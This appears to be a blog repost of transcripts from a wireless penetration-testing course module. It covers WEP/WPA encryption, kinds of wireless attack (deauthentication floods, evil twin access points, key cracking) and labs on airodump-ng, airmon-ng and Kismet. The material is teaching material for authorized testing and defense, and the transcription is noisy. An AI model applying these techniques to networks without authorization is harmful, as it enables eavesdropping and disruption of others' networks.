[COURSE_PTHE] 15. 无线

1. 简介:无线黑盒测试(Wireless Ha.cking)

    This module starts with the basic of encryption and delivers in-depth coverage of wireless intrusion, its concepts, tools and defense techniques.

    This next module in the Penetration Testing and Ethical Hacking series introduces you to the Wireless environment and its unique challenges regarding intrusion vulnerabilities.

    Penetrating wireless systems first involves encryption.  The Wireless module peels back the layers of encryption, discusses the different wireless protocols, and the various types of wireless attacks including integrity, confidentiality, and rough websites that drive the access point off line.  You’ll spend a lot of time learning the latest and greatest tools currently available to use, and you’ll cover all the key wireless mediums from cells, to air travel to automobiles, and Bluetooth.

    The Wireless module examines beginning to current day wireless networking and the required penetration knowledge, plus pen testing techniques that will help you defend those environments as an ethical hacker.

    The topics explored in the Wireless module include:

  • Whiteboard, which shows the interrelationship of all the basic components utilized in this module
  • And the following simulation labs:
    • airoDump Lab
    • airoMon Lab
    • Kismet Lab

    Hi Leo Dregier here. This is one of my favorite modules, wireless penetration testing. There is so much to do wirelessly these days – the applications in which we penetrate, penetration test systems. They have come leaps and bounds over the last ten years. It all starts with encrypting our networks. So there is multiple types of encryption. We are going to take apart web and wpa and wpa2 and all that fun stuff and we are going to look at the different types of attacks whether it be attacks on integrity and attacks on confidentiality. Unavailability like websites and things like that knocking access points offline. The whole world driving concepts whether you are driving a car or flying a plane or using a drone nowadays. We will look at the full wireless spectrum. How we can use that to our advantage and you are going to spend a lot of time on the most popular tools out there. So literally the latest and greatest stuff but before we can get to the advanced stuff we got to start one foot in front of the other and we are going to start from the beginning and go all the way to the end. We will cover a little bit on Bluetooth only because that is considered wireless. But that is realistically its own module and then lastly we will wrap up with how to defend against people poking and prodding your wireless networks. So let us go ahead and get started.

 

2. 框架

    This whiteboard lecture video covers wireless hacking in-depth. Wireless technology is continually growing whether it be with wireless LAN technology and WiFi or in other applications such as cordless telephones, smart homes, and embedded devices. Each of these new technologies comes with its own set of security issues and new opportunities for attackers.

    The field of wireless penetration testing is huge this is its own field of study and there is a lot in this module. So let us take a closer look. Some of the basic concepts here are how wireless networks are integrated into basically the corporate environment. So they can often become an extension to what we considered the wired network. They typically have multiple access points so that is multiple areas of attack. We also have 3G and 4G hot spots – or they could be an extension from local area network to another local area network. Nonetheless that is great opportunities for the penetration tester. To realistically be an expert in this field you have to know a lot of the basics of the wireless transmissions. So let us look at the standards – you are going to need to know all of the 802.11 series. A B G I N & 16 so 802.11A this is first standard or series and that operated off the five gigahertz frequency. Then BG compatible was very, very popular B was a little bit slower 11 megabits per second and then G upto 54 MegaBits per second but nonetheless they operated in 2.4 Ghz spectrum then you have 802.11I this is where we introduced WPA2 we have 802.11N we have 802.11 16 which is commonly referred to as WiMax also there is a major components here. You have the SSID which is the name of our access point. You have the concept of open authentication or anybody can connect to an access point which I don’t recommend because you are effectively just giving away access to that and I get a lot of people that always say – hey there is nothing on my network anyway. It doesn’t matter if there is nothing private or nothing sensitive on your network. If your network gets used to go attack some target well you now are downstream liability. So that is going to be a huge problem – then there is a whole subject of shared key authentication which is pressured key that we will give to our clients and use that to connect to the access points. So ultimately wireless pen testers are interested in cracking them. Then you have authentication components and then you have BSSID’s or effectively mac addresses of your access point and this is going to be pretty critical. Especially when we get into running tools like aircraft because you are going to need to get the mac address of your access point and then use that in the configurations. Before we get into the detail let us go up here to the antennas. They are different types of wireless antennas that are used. So I highly recommend just going to Google images and searching for these types of antennae that we can see a picture and be able to identify them by what they look like but the categories are directional antennas on the directional antennas, parabolic antennas, yagi antennas, these are things our grandparents might have seen hold on the televisions look at rabbit years, right and then dipole antennas. Let us move down here to attacks there is all sorts of attacks and in a second I will will break them down into confidentiality and integrity and availability style of attacks but some of the basic concepts here are we are driving around and looking for access points and receiving derivatives of that which we will talk about. Rogue access points are setting up on a unauthorized access point. Somebody connects to you the rogue access point and then you get a copy of all of the traffic as it gets relates to the real access point. Mac spoofing is an attack because effective 802.11 standard works at layer 2 of the OSI model. So one of the things we need are mac addresses. So if you can go spoof the mac address of a gateway or an access point that is huge. We are always looking for access point misconfigurations. Default settings so that is an attack within itself adhoc associations. Adhoc meaning anybody can connect promiscuous mode clients in which basically the client is in listen only modes. So they can eavesdrop on traffic and then of course client associations along with the access point mis-associations. These are important because any mis-association where it is on the client or the access point is an opportunity for the pen tester to basically go and start exploiting. Otherwise we can go up here to basic style of attacks and this is just some of the basic theory behind how do we go around and approach penetration testing for example we are driving a car looking for access points. We are flying, flying like a little drone or something looking for access points. We are walking – just walking around doing it. And I guess there could even be more bicycling if we wanted to otherwise we are chalking specifically these are symbols in which the access points can be disclosed. For example closed access points and is usually denoted as a circle open access points are like two reverse half-moons. And if there is a W in the access point that typically means there is encryption which really got it starred from originally WEP but not I would just associate that with any encryption. So to effectively attack wireless networks you are going to have to understand some basics of encryption. So this is whole category all by itself – so the first thing is the web algorithm which uses the river cipher or RC4 stream cipher and it comes in a bunch of different flavours in terms of its key size. You have 64 bit 128 bit 256 bit but because it is RC4 uses a 24 bit initialization vector. Later on WPA also used RC4 but it changed its initialization vector size to 48 bits. So an initialization vector simply stated if you look for alternative names on an initialization vector. It is basically a starting point for initialization and vector means direction and map. So starting direction of the encryption process through the algorithms. The WPA in itself changed to a 48 initialization vector because with a 24 bit initialization vector there is only 16 million 777,214 combinations of it and you could easily just exhaust 16 million of something in today’s computing power. So they changed to a 48 bit initialization vector which is a much larger keyspace – you have to understand the basics of teacab this uses a 64 bit message integrity code or MIC. What I recommend here is to just basic wikipedia on each one of these. Web TKIP AES CCMP and that is more than enough to get the back ground on where the stuff comes from. So TKIP is Temporal Integrity Protocol or the time changing of your keys. You have AES to find 802.11I which is good strong encryption as opposed to RC4 which is not really one of the best encryption algorithms. Then you have your extensible authentication protocols this is another great thing to do a wikipedia on. Because it will actually list out all of the different types of extensible authentication protocols. Then of course you have WPA2 with super cedes that of WPA and in this our first really FIPS 140-2 compliant wireless standard if you will, which can operate in a standalone mode or you can do a WPA2 Enterprise which is now connecting your wireless infrastructure to some sort of corporate infrastructure and using something like a radius or tacx to actually handle the identification authentication, authorization and accounting components. Then you have the whole leap and peep and all of the things that end in EAP. These also fall into the authentication and encryption world. So this is huge and then the whole subject of temporal keys in itself. Because you have to understand the four way handshake of – anonces and things like that. Message integrity codes or paralyzed transient keys. All of this stuff is easily looked up on a wikipedia. So I don’t want to get into the details of all of the encryption. Now you absolutely are going to see the surface on which our configuring the access the points and doing our penetration test thing in a hands on format here, shortly. Before we get into some of the specific style attacks. I want to go down here to the some of the popular tools there is no shortage of tools here in the wireless section again again this could take months and months and months to really master this content. But you do have some common tools that I want to highlight tools like insider, net surveyor, net stumbler, wireless monitor or even commercial tools like com view or even web sites like wigg or wiggly or even something like kisszet it is a great carrier backtrack scanner or wire shark which we talked about that in the sniffing modules. Other than that there is really two other categories you have air crack NG that it is own suite of tools which will take you months to master in itself and it is tough because there is a lot of configuration options there. And then there is also the whole subject of mobile tools. These mobile tools and mobile surveying tools and sniffing tools and hacking and exploitation tools. They have come years ahead of themselves in the last five years or so being 2014 now. Otherwise the next best thing to do is to really look at the style of wireless attacks from the principles. Meaning confidentiality, integrity, authentication availability and things like that. So let us take a look at some availability style attacks. My favorite is jamming the signal you have hardware jammers you have software jammers but nonetheless but basically the principals here is knocking someone offline or they can’t play either. You could just steal the access point – you could force all of the clients to do a disassociation therefore knocking everybody offline. You could flood the device with EAP failures. Therefore overwhelming the access point – you could do beacon floods, again overwhelming the access point, knocks it offline or makes it temporarily unavailable. You could a distributed denial of service style attack or denial of service attack. You could de authenticate – you send a bunch of de authentication requests these are called de authentication floods to the access point. You could intervene with a routing style attack. You could not only flood it with de authentication floods but also with authentication floods. You could manipulate the arp cash of the access point You could try to send the signal to the access point to put it in power savings mode. So just shut it down or you can do into specific exploits like TKIP and MIC attacks. And you can look these up within meta splade framework and things like that. Confidentiality style attacks focusing on disclosure oriented attacks this is where you have things like eaves dropping using a packet sniffer. Something like a wire shark or T shark or something to that effect or just you could chop that up to traffic analysis. You could try to crack the web key, if the web key is disclosed to you or the encryption key is disclosed to you that is now no longer secret. You could setup an evil twin access point. So everybody connects to your evil twin and then you forward the traffic on to the real access point therefore getting a copy of everybody’s traffic. You could setup honey pod or honey net even – you could do a session hijacking attack. Let someone connect to your wireless network legitimately and then just take over their existing section. You could masquerade as someone else or you could go just full blown man in the middle attack. Meanwhile you have integrity style attacks like data frame injections. The key to an integrity attack is it is changing modifying or altering something within the network traffic. So data frame injecting you are inserting in therefore changing the integrity of the network or the traffic therefore that is the attack. WEP injection, data replays, initialization vector attacks even bit flipping attacks or access point replay attacks or even replaying server information or even creating your network virus. Then you could focus just on authentication like focusing on how does the access point share its pre shared key. You could focus on the type of authentication like peep or leap or go after the login portal itself like a VPN login portal or the access point login or try to correct the domain information. If it is linked to something like kerberos which ultimately could result in things like identity theft or steal somebody else’s identity and then you can pretend to be them when you are actually logging in or simply just guess the key otherwise that is the basic framework of what happens in the wireless world. So let us look at some basic counter measures here if you would have try to stop the penetration tester. What could you possibly do I would personally have not much. But let us start somewhere – try using non regular pin keys. In other words we normally go to our key pads and we can do like a 1,2,3,4 A,B,C,D but there is certain out sequences that we can also use that are non-standard this definitely slows the penetration tester down. You should use the latest, greatest and strongest encryption probably goes without saying I personally laugh when I see something that is encrypted with WEP because I only need about five minutes to crack the key. You should always monitor any sort of pairing of the devices between the client and the server. So monitor the traffic, monitor the relationship of the client and server. Put your devices in a non-discoverable mode or hidden mode now that can be a deterrent but to me it is just why are they trying to hide t things. Simply stated if you turn off your SSID broadcasts you are probably trying to hide something. Something a little more valuable and probably going to go after you – just first shutting it off. As opposed to the run of the mill person who has their SSID in broadcast mode. So that is a little controversial in itself – you should use strong authentication meaning something that you have and something that you know. Use a multi layered security like for example the OSI model – so don’t just rely on layer two techniques like mac filtering or layer three techniques like route filtering but use as many layers as you possibly can otherwise it is known as defense and depths. The best practices will suggest you could turn off SSID broadcast but you guys already know how I feel about that. Shut off the remote access capabilities of it. So you have to physically access it and that creates its own set of challenges. You should absolutely change the defaults anytime you have a default that is something I can go after as a pen tester. You should use mac filters or time of day filters. Physically secured in a IOC like bunny years popping out of the ceiling I wouldn’t consider that physically secured. If you can put in wiring closet where it is actually physically blocked. In theory you can use isolation but the counter measure to that is I can use some sort of amplification to get access or increase the signal strength. Also you should use intrusion detection or intrusion prevention systems or just start penetration testing practices or best practices in themselves. So as you can see there is a lot that goes on in the wireless world. This is absolutely its own field of studies there are several certifications that map to this but what I find in the world of computer people is either there are really good people with the wireless or there is not at all. There is no like no middle ground and so we are trying to change that you know – we want to get everybody familiar with the basics of wireless. Not everybody has to a wireless pen tester but some simple basics go a very, very long way into stopping people from eavesdropping or doing integrity attacks or availability attacks or disclosure attacks on your network. To keep all of this in mind let us look at some hands on examples.

 

3. airodump-ng使用

    Get a hands-on approach to airodump-ng with this lab video in our Penetration Testing and Ethical Hacking course series.

    This lab demonstrates airodump-np, a great utility for dumping flood traffic data to a defined location for further analysis.  You’ll learn the proper launch syntax, interface selections and other output options including selection specific criteria for your monitoring session.

    In this lab I want to talk about aero dumb-ng now this lab I generally run after I run the air monitor setup which you want to see that in a previous lab But aero dump is great program to run from the command line. It is basically setup to start dumping traffic and get the summary of actually what is going on. Depending on how you actually want to set it up. So we are going to do an air dump -ng and set it up as a listener but first you have got to type it correctly. It is aero dump -h and that will bring you to the help file and you are going to want read this information through. At least one – especially if you are not familiar with it. So basically the command is relatively simple. It is just aero dump any sort of options. Where the interface or interfaces simultaneously that you want to monitor. I generally only run this at one interface at a time but it can support multiple interfaces otherwise let us cover the options. You have got dump the initialization vectors – you can set it up to work with the GPS server. You can do – write or -w these are effectively the same things. This allows you to dump to a file you can record only the beacon information from access point to access point. You can update in a particular time like for example every three seconds flashed to your screen and you update. You can show acknowledgements this prints the acknowledgements and their retries and some basic statistics. I generally stay away from that – especially at first you have got -h which is does not help but hides known stations. This is helpful because once you find the station that you want to target. You really want to filter out all of the other stations that you are not interested in. You have to attack f here – this is time between channeling hopping. You have got a –berlin this is the time before removing access point of the client from the screen where no more packets are received in other words if you don’t hear from it from so long. Let us clear it out from what we are looking at – tac-r for read this basically read from a file. -x active scanning simulation in milliseconds. Set the manufacturer – set the output format and I do typically use this because this is actually helpful for documentation. So the formats that are supported are packet capture initialization vectors. Comma Separated Values – GPS – Kismet and NetXML or ignore negative one. Removes the messages that says -fixed channel etc. Otherwise you have some basic filtering options and how you can sort this and if you want to sort the encryption or netmask or basics services that I identifier etc. etc. So it is relatively easy to use – once you understand some basics about wireless sniffing and pen testing which will go up to. Okay – so basically set this up I am just going to run a capture for the initialization vectors and I am going to do this to my wireless interface. it is aero dump -ng capture the ivs or whatever option you want and interface -with what you want to capture that with. So once i do that -then you get the see the different items and how they come in. So at first it may look a little goofy in terms of refreshing and things like that but it is not that bad – it really isn’t. So a couple of things here you have your basic service that identifiers. You are always interested i these because these are basically the mac addresses of the access points and remember that these are six byte field. So this your manufacture – this is unique per person. So I am looking for 001F90 that tells me common manufacturers that are in play. This is helpful when you are looking at a group of access points. Next I have got the power which is the signal level. I have got the actual beacons this is the number of announcements in the packets sent by each access point. I have got data or pound sign data. This is the number of captured packets for example unique initialization vector count and things like that. So you can see I have got a couple of higher initialization vector players on the network. I have got a pound sign S, this is the number of data packets per second. Measured over the last ten seconds so in this case not a lot of traffic on the network. I have got the channel which is on – so almost everybody here around me is going to be in channel 1. I have got MB this is the maximum supported by the access point. So in this case I am basically at 54. The dot after 54 indicates that there is a short preamble that is actually supported. I would not worry about that for now but does mean something later when we get into the advanced stuff. You have got ENC for the encryption algorithm that it thinks that it can enumerate. So here is an open access point – here is WAP – here is WPA2 etc. The actual cipher – these cipher could include anything from like CCMP, RAP, TKIP, WEP, WEP40, WEP104 which keep in mind that attracts the 24 bit initialization vector because normally we would call those 64 and 128 but it gives a attract a 24 bit initialization vector. It is 40 and 104 accordingly and or TKIP is an option here for the cipher type. The authentication protocol that is supported. So in this case you can see all of them are setup as pre-shared keys that is huge all in itself. Because what I can enumerate here is if there are basically wriggling the authentication to some sort of radius tac X client or is this basically just a pre-shared key since these are all pre-shared keys. Then I have got a couple of choices of how to attack this type of network. 1. Go find the preshared key – is written on the conference rooms. The boards, office – cubicles – trash cans – on the actually bottom of the devices. If I can get access to the actual devices and things like that and then of course the extended service identifier. This is the so called SSID for lack of better words then you have also the station in itself down here. So the station is the mac address of each associated station or stations. Actually connected to the actual access point – I have also got lost this is the number of data packets lost over the last ten seconds – the number of packets – the number of frames. The number of probes all which can useful depending on the tac that you are actually using. So if you notice here if I scroll on the top – you have got channel six. Elapse one minute allows status update of the top here and basically goes into the core and what is your finding which looks very, very similar to what you would see if you were to go to your wireless network adapter cards and then basically a summary of the basic service that identifies the station. The power rate loss frames in the probes – so when you are done. You can just go ahead and select control C and that will stop it and again capture initialization vectors that was extremely, extremely easy to do. It was basically ever dump -ng –ivs -wlan0 but let us say I want something different. Say I am not interested in the initialization vectors and I want the actual beacons. You just change IVS the beacons here and it will go through and you will see all the beaconing access points and basically it will simply count the number of beacons here. Right here – so in this case I have got the NSA van outside – this looks like it is sending a lot of beacons out – at the moment. So that is it – very simple programs to use. Hope you enjoyed the video and I will see you in the next wireless pen testing lab. Thank you for watching my name is Leo Dregier and don’t forget to check us out. If you haven’t already by now on Facebook, LinkedIn YouTube and Twitter.

 

4. airomon使用

    The next Wireless lab in the Penetration Testing and Ethical Hacking series introduces AiroMon.

    AiroMon is a Monitoring Mode utility.  It’s used in conjunction with the IWConfig utility to confirm your monitoring session is in “Monitoring Mode.”

    The AiroMon lab also demonstrates how you can begin analysis, testing, or packet injection for the penetration testing task you want to execute.

    Hey Leo Dregier here. I want to check out some air crack tools in the way that they are setup one of the things that I want to do is setup air monitor-ng to basically on monitoring mode. So it is – what we need to do here is do a air monitor -ng tech age and that will tell us what is going on. So it is airmon ng start stop or check in this case it was to do a quick check. Airomon –ng check and then your interface which is wan0 is what I have it setup in this case that worked out, just fine. So never going to change it from check to start and it creates these additional interfaces here. WLAN0 and then monitors yours – so this gets setup. Now once you have that setup now you can go over to the IW config utility and then just hit IW config enter. Go to your monitor and see that this is set to monitor mode and that is going to allow you to start doing things like packet injection and things like that. Also you can use IW config for trouble shooting as you may need to come back to that at a later time. Nonetheless it tells you the frequency that you are on and some basic information. One of the things that I find most hopeful with any of sort of tool like this is actually just doing some basic research on the internet. We would start getting into the wireless pen testing world. It own beast – just like web application pen testing. It is its own beast. So don’t be afraid to use the internet as your resources here. So specifically all I have done here is just check the IW config check to see that my monitor mode is actually the monitor zero interface is actually set to monitor here and that is a key piece of information. So right from the top air monitor -ng tack h check it. Start the interface – see that it is turned on and then do an IW config and just review that it is set to monitor mode and that is about it. It is relatively easy to setup but now once you run through this lab. This is great precursor activity that you want to do realistically before you want to start any sort of wireless pen testing. It is a quite sanity check so relatively easy to see if you are setup. Let us start doing some of the advanced labs and I wouldn’t go ahead and do it. So thanks for watching and I will see you in the next video.

 

5. Kismet使用

    The last lab of the Wireless module series focuses on Kismet scanning.

    Kismet is a wireless “police like” scanner for the internet.  In the Kismet lab, you’ll learn proper setup and other basic wireless network sniffing tasks.

    You’ll see a demonstration of how it works in real time and learn what criteria specific options are available to select for the desired type of monitoring analysis you want to perform in your penetration testing routine.

    Hi Leo Dregier here. I want to talk about some of the wireless pen testing tools and one of the first tools that you are going to want to run is basically a packet sniffer. A wireless scanner called kismet, kismet is a great little scanner I would like to think of it as a kind of police scanner for wireless networks. So what we are going to do is walk through this setup basically just do some basic wireless sniffing. First thing we are going to do in our Kali operating system is we are going to go over to Kali – go over to wireless tools and then start kismet from the menu. You can of course just type kismet from the bash prompt and that would be just fine. So kismet – it says kismet is running its root – kismet was starting as root – this is not recommended and can be dangerous – only because basically it gets a higher priority to the system. If you are just poking and prodding around. It is absolutely fine so you could say do not show the warning again or just go ahead and select okay. So automatically start the kismet server – launch kismet server and connect to it automatically. If you use a kismet server started elsewhere choose no. In this case I don’t have another instance of it running – so I am going to go ahead and select yes. Startup options if I want anything – set login to on – the log title is kismet show the console and then go ahead and click start and you should start seeing some basic information and / or error messages pop to the screen. They can see one of the error messages that I am getting towards the bottom here. Couldn’t I connect to the GPS server or reconnect in five seconds and then ten seconds and fifteen seconds and it will continue to doing this. But it did accept the connection from 127.0.0.1 kismet started with no packets or system find. No sources were to find or all defined sources has encountered unrecoverable errors. Kismet will not be able to capture any data until it capture interfaces at it. Would you like to do this – this is a relatively easy message to get around because we just simply have to add our interfaces. So go ahead and select yes. In this case the interface is going to be WLAN0 the name of it wireless LAN0 and any sort of options you could add. Otherwise just go ahead and select them and it says kismet. You can read these messages here – they go by relatively quickly but I am already starting to see traffic because of all these detected, detected, detected plus I am seeing the mac addresses of the interfaces plus the actual SSID names of the interfaces. That is there coming in – the one that we are going to be working with Cybrary which you can see right there towards the top. So close the console window that is going to be fine and then you can see if I make this a little bit bigger that basically I have my console. Basically detecting information now just this in itself is huge because tells me a lot of things. One I have my wireless card connected – wireless card that I am using right now which you can see in the BM setup is the etherous UB91C interface wireless card which is a great card to use. You can basically setup up a wireless pen testing kit for right around a hundred dollars and that would probably get you a decent card. Maybe a GPS receiver and if you are lucky maybe a blue tooth sniffer or blue tooth antennae. So we are going to go here and you can see the Cybrary interface here if I scroll down. It is going to bounce around a little bit but if I just read Cybrary – it is you can see that it is on channel one. It is receiving packets – I have some size and some traffic on it and there is a couple of things running on channel one. Others are running on channel six and eleven. So those are definitely the high traffic channels at the moment and then basically it is just going through this and you can click on this menu up here. There is your server console – I can do a d for disconnect or c to connect. I can add a source – I can configure a channel – configure plugins and you can basically just kind of through this if you wanted to. So if I wanted to add a plugin I could select the plugin and it is basically. You scroll down with your up and down arrows – hit enter here. So preferences – I wanted to set up some preference I could setup colors or GPS or columns or servers or hoardings or start and stop the server. Also I can sort I can – right now set to auto sort. But I can sort by type channel what is encrypted versus not. So I just do e this will basically set it up to what setup for encryption and that will stop it from bouncing around a little bit. So that is a good idea the sort – otherwise if you do a just click on the sort menu here at the top. You will be able to see the networks in play here – so like s for sword or k for kismet or v for view and w for windows. So I like to do a Ctrl Alt and that will give me that menu and s for sword or hit enter etc, etc. So you can scroll through that – you can do first scene, last scene, sort by the SSID or SSID and then you can just basically either type the letter here that you want and that will automatically do it for you. If you are into keyboard shortcuts or you can actually just scroll through and actually select it if you want. So now I have got a set SSID another cool part about what kismet does is that it actually shows you which people have their SSID set to do not broadcast and I like that because what are they trying to hide at that point. But we are going to scroll here and look at Cybrary which is the access point that I currently have setup. You can see the BSSID001 F9028614 and it is basically setup to encrypt away traffic. So I can go ahead and hit enter there and I can kind of scroll through here and get a basic overview of how that access point setup. So I have your SSID, Cybrary your B SSID again 001F and we will just call 001F for short and it is definitely very helpful to go ahead and write that down because whenever you are doing any sort of the attack. You are going to need the reference these b SSID’s and especially if you start getting into spoofing access points and things like that. The manufacturer is action te which is action tech which is basically default horizon access point that we have for some time now – I just started it so it is first seen as accurate. It is an access point setup as a managed infrastructure. It is running on channel one shows me the frequencies that is running on and what packets it has seen per frequency and what percentage of the traffic. So it is running on frequency 24, 12 and 17 the most because that is where about 70% of the traffic is actually coming on. The SSID is Cybrary – so not only does it say the name at the top but also the SSID at the bottom. The beacon – beacons are types of traffic this is basically an advertisement to one access point to another access point. The 802.11 D country I am set in the United States – the encryption level is set – 10% of the traffic has been weakens. Also I have my signals, noise – what encryption it thinks it is set as. So it is picking up as it is set up as WEP which is correct and the interface which it is seen on wireless LAN zero and so that will give you a basic overview of basically how this is setup. So accidentally shutdown the server, so let me start back up again and you notice it is okay to that. Sometimes you go in and out of this little scanner. Time after time after time – on a second it should pop up or you can actually tell it to start the server. So kismet starts server – started give it a second to run – okay now that the server is back and running. We can go ahead and basically look at the different types of traffic here. So you can set for specific networks if you want to do an Alt N that will bring it to network menu. We are not going to need that right now – so we are going to close out of that. Also you could do an Alt V and that will show you the view menu as well. So – if you want to mess with that you certainly could. Now that kismet is up and running and I have it sorted to Cybrary and you get all of the basic details that you need here right in this menu and you get to specifically see some of the traffic in the pattern and I have got a sorted the Cybrary. Otherwise some of the other things that you guys can do in here is you can go through the sort menus. The view menus – if you want to look at the GPS data battery information. Status these are all different things that can add – specifically like client list and things like that per interface. So you can see that I have got a couple of clients connected to the Cybrary interface as well that is how full because that tells you one corresponding to the number of packets that the access point is actually seeing. You would expect with large number of clients that produce a lot more traffic. So that would make sense as well otherwise you kind of poke around that is all based on keyboard shortcuts like I said it is used as a police scanner of sorts. If you just want to read these information messages right here. You can kind of see what is happening between the clients and server and things like that – if you do decide to use this with a particular GPS client that will be really, really helpful for plotting the networks up. I currently don’t have the GPS setup at this time but I could easily do that as well I would just have to plug it in and then have kismet basically read the GPS data as well. Then you can go out and you start war driving or war walking or war chalking which is your symbols and you can go ahead do all the classic stuff right here. Otherwise it is basically just poking and prodding around and getting an idea of how this works. The kismet menu really, really simple plug in preferences disconnecting connect. Start the server, stop the server sword by type channel. If it is encrypted or not basic service that identifier. The number of packets and what you actually want to be like the client list. Sometimes it is easier to take off that client list just because it cleans up your interface your little bit. So like I said basic program to use – I love it as a basic sniffer. A quick sanity check for who is out there and then you can have some with it. Then you start getting into some of the advanced details. You want to start seeing the client list for that particular interface. You can start pooling the mac addresses of the clients connected to it. And then finally you just shut down the server Ctrl+C will shut it down. It will say kismet client is – so that is the basic setup of little wireless scanner like kismet. There are other ones that are certainly more popular but this gives you all the critical information that you need. So that if you want to start doing air monitor or something like this. You get the basic service that identifier and things like that because the next step would be to take the things that you would learn from kismet and then start learning. How to do some of that – air cracking G suits. So for example air monitor -ng is certainly going to be one of the next things that you are going to do. So I just did an airmon ng -h and you can see that air mon -ng start stop, check the interface and then the channel. So just to give you an idea air mon -ng start sniffing the traffic, use your interface. WLAN Zero and we were set to channel one. Channel frequency now some of the mandatory stuff is going to be in the greater and less than bracket. So start stop check that is mandatory and then interface is mandatory and then the channel of frequency is optional but if you know it. You don’t add it in – Okay. So here is an airmon found through processes that could cause trouble. If air dump player – tunes starts working after the short period. You may want to kill some of that – so in this case the network manager. The WPA client and DH client these are all potentially interfering with this which is similar to doing an airmon -ng check. So in the some of the old conventions you could do a check kill and so that would actually – is very, very helpful because anything that has the potential for interfering this. It is will actually kill the processes that are interfering. So you can do that right from within this as opposed to doing something like a kill or ps kil or something like that where you actually have to type all of this stuff in. Basically if you put kill at the end of your statement that will certainly speed things up and then we will just go and turn it on again. And now we get something completely different. Airmon started for the wireless interface channel one. So we have got WLAN0 monitor interface with my arrows and monitor mode enabled on my monitor one and then we also get out monitor channel. So basically we are set to monitor mode at this point. I have just done very very basic stuff here. i setup kismet as a scanner. I looked around I looked around I have got some basic information that I need and then I can go ahead and spin that offer and run that into some other labs like air monitor and things like that. And who would cover those in sequence videos and things like that. I just want to get the basics for kismet setup first so that I can start sniffing out basic service identifiers and it will be hopeful to have a pen and paper handy. So that you can jot down SSID’s and clients and mac addresses and extended service identifier or some things like that. So that is an overview of kismet thanks for watching my name is Leo Dregier and I will see you in the next video?

 

posted @ 2015-09-30 22:19  It's_Lee  阅读(174)  评论(0编辑  收藏  举报